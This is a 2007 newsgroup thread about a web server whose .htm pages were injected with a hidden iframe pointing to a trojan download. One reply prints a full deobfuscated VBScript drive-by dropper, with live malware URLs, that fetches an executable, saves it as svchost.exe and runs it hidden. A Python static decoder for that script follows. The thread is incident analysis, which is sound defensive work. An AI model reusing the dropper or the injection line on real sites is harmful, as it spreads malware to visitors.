Server infected by a trojan

Posted by s on September 6, 2007, 11:25 am
Hi folks,
Hoping someone here might be able to give some advice on an infection.
Today at around 9:42am my local time one of my web servers got infected
somehow. Whatever infected it then scanned through all .htm files on
the server and added the following line near the bottom of each one.

I've removed the domain name:-
<iframe src=http://www.<DOMAINNAME>.com/hkeraone/hker.htm widht=0
height=0></iframe>


So, any time someone tried to view a site on my server they were also
directed to a Trojan download.

I have since removed these lines from all the .htm files but I have no
idea how someone managed to run a program on my server that inserted all
these lines.

Obviously I'm no expert on security etc but I have tried to make sure my
firewall is up to a reasonable standard and also have Norton AV
Corporate running on the server.

Any advice/help is much appreciated.


Posted by Gabriele Neukam on September 6, 2007, 11:42 am
On this special day, s wrote:

> Today at around 9:42am my local time one of my web servers got infected
> somehow. What ever infected it then scanned through all .htm files on the
> server and added the following line near the bottom of each one.
>
> I've removed the domain name:-
> <iframe src=http://www.<DOMAINNAME>.com/hkeraone/hker.htm widht=0
> height=0></iframe>

Maybe it is related to this incident

http://www.heise-security.co.uk/news/95591


Gabriele Neukam

Gabriele.Spamfighter.Neukam@t-online.de

--
> Is there such a thing as a Honeymoon period in a new newsgroup?
(Roger Hunt in uk.comp.vintage)
In a want it now instantly straight away world - no :-)
(Krustov in ucv)



Posted by s on September 6, 2007, 2:13 pm
Gabriele Neukam wrote:
> On this special day, s wrote:
>
>> Today at around 9:42am my local time one of my web servers got
>> infected somehow. What ever infected it then scanned through all .htm
>> files on the server and added the following line near the bottom of
>> each one.
>>
>> I've removed the domain name:-
>> <iframe src=http://www.<DOMAINNAME>.com/hkeraone/hker.htm widht=0
>> height=0></iframe>
>
> Maybe it is related to this incident
>
> http://www.heise-security.co.uk/news/95591
>
>
> Gabriele Neukam
>
> Gabriele.Spamfighter.Neukam@t-online.de
>

It could well be related, I really don't know.
What I don't understand is how hackers get the server to run something
that then scans all the .htm files and injects the iframe line.


Posted by jen on September 6, 2007, 4:24 pm
> Gabriele Neukam wrote:
>> On this special day, s wrote:
>>> Today at around 9:42am my local time one of my web servers got
>>> infected somehow. What ever infected it then scanned through all
>>> .htm files on the server and added the following line near the
>>> bottom of each one.
>>> I've removed the domain name:-
>>> <iframe src=http://www.<DOMAINNAME>.com/hkeraone/hker.htm widht=0
>>> height=0></iframe>
>> Maybe it is related to this incident
>> http://www.heise-security.co.uk/news/95591
> It could well be related, I really don't know.
> What I don't understand is how hackers get the server to run something
> that then scan's all the .htm files and injects the iframe line.

Maybe reading this will enlighten you some(Google is your friend):

Virus Attack on web server
Iframe code getting added to each page request:
http://www.webmasterworld.com/microsoft_asp_net/3279736.htm

large-scale web attacks targeting sites and their users:
http://arstechnica.com/news.ars/post/20070618-security-researchers-uncover-massive-attack-on-italian-web-sites.html

-jen



Posted by Virus Guy on September 6, 2007, 8:10 pm
s wrote:

> (...) hker.htm

While searching the web for instances of kher.htm, I came across
these:

(warning - do not follow these links unless you know what you're
doing)

www.goldwindos2000.com/hkeraone/test.htm
us6.redhat520.com/haoba.htm

They are really executable files (not htm).

As of around 2 pm (EST), test.htm is identified mostly as a
downloader.trojan (4608.KF / 4608.102). Detection rate is 47% (not
detected by Kaspersky, Symantec among others).

haoba.htm is identified as Explorer.Hijack.AJYS / .4080. Detection
rate is 37%. Not detected by Avast, F-prot, Kaspersky, McAfee,
Microsoft, Symantec, among others.

---------------------------------

hker.htm is being coded with random spaces to give different MD5
hashes.

I submitted a sample to VT, and only 2 AV's id'd it as a threat:

Authentium: VBS/Psyme.BT@dl
NOD32v2: JS/Exploit.ADODB.Stream.Y

See this:

http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=VBS_PSYME.FP

When you take out the spaces, here's what it is (can someone decode
this script and print the URL?)

(I removed a few < and > because my nntp server doesn't like HTML code
I guess)

<html>
<script language="VBScript">
On Error Resume Next
dl = "http://www.goldwindos2000.com/hkeraone/test.htm"
' RDS.DataSpace ActiveX control; its CreateObject method is abused as a
' factory for COM objects that script is not normally allowed to create
' (the flaw patched in MS06-014)
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
' ProgIDs are assembled from fragments so that a signature scanner never
' sees "Microsoft.XMLHTTP" or "Adodb.Stream" as a plain string
b4 = "Mi"
b5 = "cr"
b6 = "o"
b7 = "soft"
b8 = ".X"
b9 = "M"
b10 = "L"
b11 = "H"
b12 = "T"
b13 = "T"
b14 = "P"
strb = b4 & b5 & b6 & b7 & b8 & b9 & b10 & b11 & b12 & b13 & b14   ' "Microsoft.XMLHTTP"
Set x = df.CreateObject(strb, "")
a4 = "A"
a5 = "d"
a6 = "o"
a7 = "d"
a8 = "b"
a9 = "."
a10 = "S"
a11 = "t"
a12 = "r"
a13 = "e"
a14 = "a"
a15 = "m"
stra = a4 & a5 & a6 & a7 & a8 & a9 & a10 & a11 & a12 & a13 & a14 & a15   ' "Adodb.Stream"
Set S = df.CreateObject(stra, "")
S.type = 1   ' adTypeBinary
c4 = "G"
c5 = "E"
c6 = "T"
strc = c4 & c5 & c6   ' "GET"
' fetch test.htm (really an executable, see above) into memory
x.Open strc, dl, False
x.Send
fname1 = "svchost.exe"
Set F = df.CreateObject("Scripting.FileSystemObject", "")
Set tmp = F.GetSpecialFolder(2)   ' 2 = TemporaryFolder
S.open
fname1 = F.BuildPath(tmp, fname1)   ' %TEMP%\svchost.exe
S.write x.responseBody
S.savetofile fname1, 2   ' 2 = adSaveCreateOverWrite
S.close
' run the dropped file with a hidden window
Set Q = df.CreateObject("Shell.Application", "")
Q.ShellExecute fname1, "", "", "open", 0
</script>
<head>
<title>Hello!!!</title>
</head>
<body>
</body>
</html>
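A static decoder for the script above, as an added example that is not part of Virus Guy's post. It tracks the string variables built by the `&` concatenations, resolves the ProgIDs handed to CreateObject, the download URL and method, the dropped filename and what gets executed, all without running the script. SAMPLE_SCRIPT is the script body as quoted in the post with the spacing restored and the one-per-line fragment assignments joined with VBScript's `:` separator; the whitespace-stripped digest addresses the random-space padding the post mentions.

```python
"""Resolve the string-splitting obfuscation in the VBScript dropper quoted
above and report what it does, statically, without executing it."""
import hashlib
import re

# Script body from the post (added example; spacing restored, one-per-line
# fragment assignments joined with VBScript's ':' statement separator).
SAMPLE_SCRIPT = '''
On Error Resume Next
dl="http://www.goldwindos2000.com/hkeraone/test.htm"
Set df=document.createElement("object")
df.setAttribute "classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
b4="Mi":b5="cr":b6="o":b7="soft":b8=".X":b9="M":b10="L":b11="H":b12="T":b13="T":b14="P"
strb=b4&b5&b6&b7&b8&b9&b10&b11&b12&b13&b14
Set x=df.CreateObject(strb,"")
a4="A":a5="d":a6="o":a7="d":a8="b":a9=".":a10="S":a11="t":a12="r":a13="e":a14="a":a15="m"
stra=a4&a5&a6&a7&a8&a9&a10&a11&a12&a13&a14&a15
Set S=df.createobject(stra,"")
S.type=1
c4="G":c5="E":c6="T"
strc=c4&c5&c6
x.Open strc,dl,False
x.Send
fname1="svchost.exe"
Set F=df.createobject("Scripting.FileSystemObject","")
Set tmp=F.GetSpecialFolder(2)
S.open
fname1=F.BuildPath(tmp,fname1)
S.write x.responseBody
S.savetofile fname1,2
S.close
Set Q=df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
'''

ASSIGN_RE = re.compile(r"^([A-Za-z_]\w*)\s*=\s*(.+)$")      # plain (non-Set) assignment
STRING_RE = re.compile(r'^"([^"]*)"$')
CREATE_RE = re.compile(r"\.CreateObject\(\s*([^,)]+)", re.IGNORECASE)
OPEN_RE = re.compile(r"\.Open\s+(\w+)\s*,\s*(\w+)", re.IGNORECASE)
SAVE_RE = re.compile(r"\.SaveToFile\s+(\w+)", re.IGNORECASE)
EXEC_RE = re.compile(r"\.ShellExecute\s+(\w+)", re.IGNORECASE)
CLSID_RE = re.compile(r"clsid:([0-9A-Fa-f-]+)", re.IGNORECASE)


def split_statements(src):
    """Split on newlines and on ':' outside string literals (URLs contain ':')."""
    stmts = []
    for line in src.splitlines():
        buf, in_str = [], False
        for ch in line:
            if ch == '"':
                in_str = not in_str
            if ch == ":" and not in_str:
                stmts.append("".join(buf))
                buf = []
            else:
                buf.append(ch)
        stmts.append("".join(buf))
    return [s.strip() for s in stmts if s.strip()]


def eval_string_expr(expr, env):
    """Evaluate "literal" & var & ... against known strings; None otherwise."""
    parts = []
    for piece in expr.split("&"):
        piece = piece.strip()
        m = STRING_RE.match(piece)
        if m:
            parts.append(m.group(1))
        elif piece in env:
            parts.append(env[piece])
        else:
            return None
    return "".join(parts)


def analyse(src):
    """Track string variables statement by statement and summarise the
    objects created, the download, the dropped file and what gets run."""
    env = {}
    report = {"classid": None, "objects": [], "download": None,
              "dropped_file": None, "executes": None}
    for stmt in split_statements(src):
        m = CLSID_RE.search(stmt)
        if m:
            report["classid"] = m.group(1).upper()
        m = ASSIGN_RE.match(stmt)
        if m:
            value = eval_string_expr(m.group(2), env)
            if value is not None:            # skip non-string assignments
                env[m.group(1)] = value
            continue
        m = CREATE_RE.search(stmt)
        if m:
            report["objects"].append(eval_string_expr(m.group(1), env) or m.group(1))
        m = OPEN_RE.search(stmt)
        if m:
            report["download"] = tuple(env.get(v, v) for v in m.groups())
        for key, rx in (("dropped_file", SAVE_RE), ("executes", EXEC_RE)):
            m = rx.search(stmt)
            if m:
                report[key] = env.get(m.group(1), m.group(1))
    return report


def normalised_digest(src):
    """SHA-256 with all whitespace removed, so space padding no longer changes the hash."""
    return hashlib.sha256(re.sub(r"\s", "", src).encode()).hexdigest()


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_SCRIPT).items():
        print(f"{key:13} {value}")
    print("normalised   ", normalised_digest(SAMPLE_SCRIPT))
```

The dropped file lands in the folder returned by GetSpecialFolder(2), the user's TEMP directory, so the report gives the bare filename; the normalised digest is the value to share when the padded variants all carry different MD5s.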
